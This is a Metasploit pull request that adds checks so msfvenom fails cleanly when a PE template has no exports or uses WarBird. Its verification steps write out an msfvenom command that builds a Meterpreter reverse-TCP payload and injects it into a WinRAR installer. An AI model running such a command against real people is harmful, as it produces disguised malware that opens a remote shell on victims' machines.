### PR TITLE
Ensure all EXE template files have exports before attempting to use them as templates

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -218,7 +218,7 @@ GEM
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memory_profiler (1.0.0)
-    metasm (1.0.4)
+    metasm (1.0.5)
     metasploit-concern (3.0.2)
       activemodel (~> 5.2.2)
       activesupport (~> 5.2.2)

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -16,12 +16,6 @@ module Exe
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
-      if is_warbird?(pe_orig)
-        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
-      end
-      if pe_orig.export && pe_orig.export.num_exports == 0
-        raise RuntimeError, "The template file doesn't have any exports to inject into!"
-      end
       pe = pe_orig.mini_copy
 
       # Copy the headers and exports

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -16,6 +16,12 @@ module Exe
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
+        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
+      end
+      if pe_orig.export && pe_orig.export.num_exports == 0
+        raise RuntimeError, "The template file doesn't have any exports to inject into!"
+      end
       pe = pe_orig.mini_copy
 
       # Copy the headers and exports

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -154,6 +154,9 @@ module Exe
       if is_warbird?(pe_orig)
         raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
       end
+      if pe_orig.export && pe_orig.export.num_exports == 0
+        raise RuntimeError, "The template file doesn't have any exports to inject into!"
+      end
       pe = pe_orig.mini_copy
 
       # Copy the headers and exports


### PR DESCRIPTION
Fixes #9867 

This fixes an error whereby if a user specified a template EXE via `msfvenom`'s `-x` option, and that template EXE did not have any exports, one would get a `nil` pointer dereference error. The fixes are applied to two files, `segement_appender.rb` and `segment_injector.rb`, as `segment_injector.rb` will be used if the `-k` option of `msfvenom` is used in conjunction with its `-x` option.

I also noticed that one of the files did not check to see if the file has WarBird enabled or not despite us performing pretty similar operations, so I also added this check in to ensure the two functions match each other in behavior and so we don't run into unexpected errors.

## Verification

List the steps needed to make sure this thing works

- [x] Download winrar-x64-000.exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-600.exe
- [x] **Run**: `./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -f exe -x winrar-x64-600.exe -k -o winrar_new.exe`
- [ ] **Verify** that before the patch this command would fail with a `nil` error.
- [x] **Verify** that after the patch this command now fails with `Error: The template file doesn't have any exports to inject into!`
- [ ] Document any issues encountered.